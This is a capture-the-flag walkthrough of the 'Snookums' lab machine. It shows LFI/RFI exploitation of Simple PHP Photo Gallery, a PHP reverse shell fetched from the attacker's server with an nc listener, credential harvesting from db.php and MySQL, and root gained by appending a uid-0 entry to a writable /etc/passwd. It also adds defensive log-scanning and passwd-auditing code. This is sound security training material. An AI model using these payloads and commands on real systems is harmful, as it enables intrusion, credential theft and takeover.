Snookums
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-04 06:43 +03
Nmap scan report for 192.168.115.58
Host is up, received echo-reply ttl 61 (0.17s latency).
Scanned at 2025-10-04 06:43:25 +03 for 242s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.235
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtUk/m8ssh+nfn52VkolWbpJihGyH2vdELXJv/X0HIj5hbkXnM1QgSSKltTq+cev1QtkrwtUTV3j2AD5Ftxz7ivrm0PvsGNI6QGnIxdAwCvt1OjDHoz6IGDS4kz5IcW3Q3S
mwceCwDKPA55mupKhKlKjkZyLn4+d9An50AV1Hyj+E8APALHQBQFVp7cdJe9lqj7K8dxNVo1XExUDgU3trRSGDO5bZN7C57VsHXN6MIITU9RtyMhLbxYwA6KTU8RluW1/5v7T4EnHlRZcdmbneVcefK+EK69Mgdn5L+ww/5YrWi
YbXDOUTEymWfeyoOl2LoFBD/nmSb9hayKirR4guf
| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOk5HGeIHhlXkWc9v507Ap0zc5wnKxhGa7WG9fWJhL/yr9bveHEBZllHErnP6vaWM4WRudCxA6z6rqnhep9wNW8=
| 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDvde70kt/TjqXRmChJ0XvKYTpljMNu6TKlAtF/S4IHL
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
|_vulners: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql syn-ack ttl 61 MySQL (unauthorized)
33060/tcp open mysqlx syn-ack ttl 61 MySQL X protocol listener
Service Info: Host: SNOOKUMS; OS: Unix
FTP (21):
Anonymous login is allowed, but I could not do anything with it or find anything useful.
HTTP (80):
Run directory fuzzing:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ gobuster dir -u http://192.168.115.58 -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.115.58
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 206]
/.htaccess.php (Status: 403) [Size: 215]
/.htaccess (Status: 403) [Size: 211]
/.hta.php (Status: 403) [Size: 210]
/.htpasswd (Status: 403) [Size: 211]
/.htpasswd.php (Status: 403) [Size: 215]
/cgi-bin/ (Status: 403) [Size: 210]
/css (Status: 301) [Size: 234] [--> http://192.168.115.58/css/]
/db.php (Status: 200) [Size: 0]
/functions.php (Status: 200) [Size: 0]
/image.php (Status: 200) [Size: 1508]
/images (Status: 301) [Size: 237] [--> http://192.168.115.58/images/]
/index.php (Status: 200) [Size: 2730]
/index.php (Status: 200) [Size: 2730]
/js (Status: 301) [Size: 233] [--> http://192.168.115.58/js/]
/photos (Status: 301) [Size: 237] [--> http://192.168.115.58/photos/]
Progress: 9226 / 9226 (100.00%)
===============================================================
Finished
===============================================================
Let's explore the website:

Simple PHP Photo Gallery is running on port 80 and exposes its version, 0.8, so we can search for public exploits:

We can test whether this vulnerability still exists or has been fixed.
The exploit states that the application was vulnerable to LFI, and to RFI as well if allow_url_fopen was enabled.
The vulnerable endpoint is /image.php?img=.
We can test this out:

The vulnerability still exists.
Try RFI:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Go back to our web server:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.115.58 - - [04/Oct/2025 07:18:23] code 404, message File not found
192.168.115.58 - - [04/Oct/2025 07:18:23] "GET /test.php HTTP/1.0" 404 -
The target tried to fetch test.php from our web server but did not find it, so the remote include is being attempted.
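As an added, defender-side example (not part of the original writeup): a small Python scanner over constructed Apache combined-log lines that flags the two abuse patterns described above on the /image.php?img= parameter, path traversal and a remote URL. The log lines and the client address in them are constructed for this example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (not from the target box) covering one benign
# request, one traversal attempt and one remote-include attempt against image.php.
SAMPLE_LOG = """\
192.168.45.235 - - [04/Oct/2025:07:15:01 +0300] "GET /image.php?img=photos/1.jpg HTTP/1.1" 200 1508 "-" "Mozilla/5.0"
192.168.45.235 - - [04/Oct/2025:07:16:12 +0300] "GET /image.php?img=../../../../etc/passwd HTTP/1.1" 200 1226 "-" "curl/8.0"
192.168.45.235 - - [04/Oct/2025:07:18:23 +0300] "GET /image.php?img=http://192.168.45.235/test.php HTTP/1.1" 200 0 "-" "curl/8.0"
192.168.45.235 - - [04/Oct/2025:07:19:05 +0300] "GET /index.php HTTP/1.1" 200 2730 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def classify_img(value: str) -> Optional[str]:
    """Label a suspicious img= value, or return None when it looks like a normal relative path."""
    v = unquote(value)                      # second decode catches double-encoded values
    if SCHEME_RE.match(v):
        return "rfi_remote_url"             # http://, ftp://, ...: include() would leave the web root
    if "../" in v or "..\\" in v or v.startswith("/"):
        return "lfi_path_traversal"         # walks out of the photos directory or names an absolute file
    return None

def scan_access_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious /image.php request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != "/image.php":
            continue
        for val in parse_qs(parts.query, keep_blank_values=True).get("img", []):
            label = classify_img(val)
            if label:
                findings.append({"ip": m["ip"], "ts": m["ts"], "img": unquote(val),
                                 "label": label, "status": int(m["status"])})
    return findings

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A matching outbound fetch from the web server to an external host, like the one our http.server logged above, is the second signal to correlate with these entries.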
Exploitation:
Shell as apache:
We can now copy the PHP reverse shell from the webshells directory and change the IP and the port to get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ cat shell.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.235'; // CHANGE THIS
$port = 80; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
<snipped>
We have to set our port to something the target can reach, because if an egress firewall is running it may block all outbound ports except those used by configured services such as HTTP or MySQL.
As the nmap scan shows that port 3306 is open, we will start our web server on that port to host the PHP reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 3306
Serving HTTP on 0.0.0.0 port 3306 (http://0.0.0.0:3306/) ...
And start our listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ nc -nlvp 80
listening on [any] 80 ...
Now try with shell.php instead of test.php:

The request hangs, because we got a shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 3306
Serving HTTP on 0.0.0.0 port 3306 (http://0.0.0.0:3306/) ...
192.168.115.58 - - [04/Oct/2025 07:27:46] "GET /shell.php HTTP/1.0" 200 -
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.235] from (UNKNOWN) [192.168.115.58] 49114
Linux snookums 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
00:27:47 up 1:15, 0 users, load average: 0.04, 0.04, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$
Stabilize our shell:
sh-4.2$ which python
/usr/bin/python
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ export TERM=xterm
bash-4.2$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
bash-4.2$ stty rows 43 columns 171
Now we have a fully interactive shell.
Reading /etc/passwd shows that a user michael exists; we then list the home folder:
bash-4.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
michael:x:1000:1000:Michael:/home/michael:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
bash-4.2$ ls -la
total 0
drwxr-xr-x. 3 root root 21 Jun 9 2020 .
dr-xr-xr-x. 17 root root 224 Jun 9 2020 ..
drwx------. 2 michael michael 100 Jul 9 2020 michael
Lateral Movement to michael:
As we saw in the gobuster output, there is a db.php; let's read it for credentials that we might reuse, or use to access the MySQL database:
bash-4.2$ cat /var/www/html/db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
Try it with mysql:
bash-4.2$ mysql -h localhost -u root -pMalapropDoffUtilize1337
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
We successfully authenticated to MySQL as root with that password.
Lets do some enumeration:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
SimplePHPGal is not a default database, so that is the one to look at:
mysql> use SimplePHPGal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> desc users;
+----------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------+--------------+------+-----+---------+-------+
| username | varchar(20) | YES | | NULL | |
| password | varchar(100) | YES | | NULL | |
+----------+--------------+------+-----+---------+-------+
2 rows in set (0.00 sec)
We have a users table with two columns.
mysql> select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)
The passwords look base64-encoded; decoding them (twice, since the first pass yields more base64) gives plaintext we can try one by one:
bash-4.2$ echo 'U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==' | base64 -d | base64 -d
HockSydneyCertify123
Let's try this password for michael:
bash-4.2$ su michael
Password: HockSydneyCertify123
[michael@snookums html]$
We are michael.
Privilege Escalation:
I will upload linpeas to perform a quick automated scan for us:
[michael@snookums shm]$ curl http://192.168.45.235/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 933k 100 933k 0 0 111k 0 0:00:08 0:00:08 --:--:-- 147k
[michael@snookums shm]$ chmod +x linpeas.sh
[michael@snookums shm]$ ls
linpeas.sh
Run it:
[michael@snookums shm]$ ./linpeas.sh
<snipped>
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. NO
We can confirm this:
[michael@snookums shm]$ ls -la /etc/passwd
-rw-r--r--. 1 michael root 1226 Oct 4 00:43 /etc/passwd
The passwd file is owned by michael and therefore writable by us, which lets us add a new user with root privileges.
First we need to generate a password hash using openssl or any other tool:
[michael@snookums shm]$ openssl passwd -1 -salt YouGotHacked password123
$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr
Append an entry with this hash for the new user Caesar3 to the end of the passwd file:
[michael@snookums shm]$ echo 'Caesar3:$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr:0:0:test:/root:/bin/bash' >> /etc/passwd
We set the user id and group id to 0, the same as root.
Check if our command worked:
[michael@snookums shm]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
<snipped>
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
Caesar3:$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr:0:0:test:/root:/bin/bash
Our newly created user appears at the bottom of the file.
Now switch user to Caesar3:
[michael@snookums shm]$ su Caesar3
Password: password123
[root@snookums shm]# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:httpd_t:s0
We successfully rooted the box.
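An added example (not from the writeup): a Python audit that checks an /etc/passwd file for the three indicators this step leaves behind: a crypt hash in the password field instead of "x", a second uid-0 account, and a file owned or writable by a non-root user. The sample content is constructed to mirror the injected entry above.

```python
import os
import stat
from typing import Dict, List

# Constructed /etc/passwd excerpt modelled on the box: the last line is the injected entry,
# with an MD5-crypt hash in field 2 instead of "x" and uid/gid 0 under a non-root name.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
michael:x:1000:1000:Michael:/home/michael:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
Caesar3:$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr:0:0:test:/root:/bin/bash
"""

def audit_passwd_content(text: str) -> List[Dict[str, object]]:
    """Flag entries that should never appear in a shadowed /etc/passwd."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "user": line, "issue": "malformed_entry"})
            continue
        user, pw, uid, gid = fields[0], fields[1], fields[2], fields[3]
        issues = []
        if pw == "":
            issues.append("empty_password")          # login needs no password at all
        elif pw not in ("x", "*", "!", "!!"):
            issues.append("hash_in_passwd")          # hash is world-readable and bypasses /etc/shadow
        if uid == "0" and user != "root":
            issues.append("extra_uid0_account")      # a second superuser
        elif gid == "0" and user != "root":
            issues.append("root_group_account")
        for issue in issues:
            findings.append({"line": lineno, "user": user, "issue": issue})
    return findings

def check_ownership(mode: int, uid: int, gid: int) -> List[str]:
    """Expected state for /etc/passwd is root:root with mode 0644 and no group/world write bit."""
    issues = []
    if uid != 0:
        issues.append("owner_not_root")              # owner can write regardless of mode bits
    if gid != 0:
        issues.append("group_not_root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("group_or_world_writable")
    return issues

def audit_passwd_file(path: str = "/etc/passwd") -> Dict[str, object]:
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    return {"ownership": check_ownership(st.st_mode, st.st_uid, st.st_gid),
            "entries": audit_passwd_content(content)}

if __name__ == "__main__":
    print(audit_passwd_file())
```

On the box itself the ownership check alone (michael:root, mode 0644) would have flagged the file before any entry was added.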
Read the flags:
[root@snookums shm]# cat /root/proof.txt
3f684b0bd97f2e1b88aa03326d413184
[root@snookums shm]# cat /home/michael/local.txt
abf19481ec7d4a219639adca6a3f933b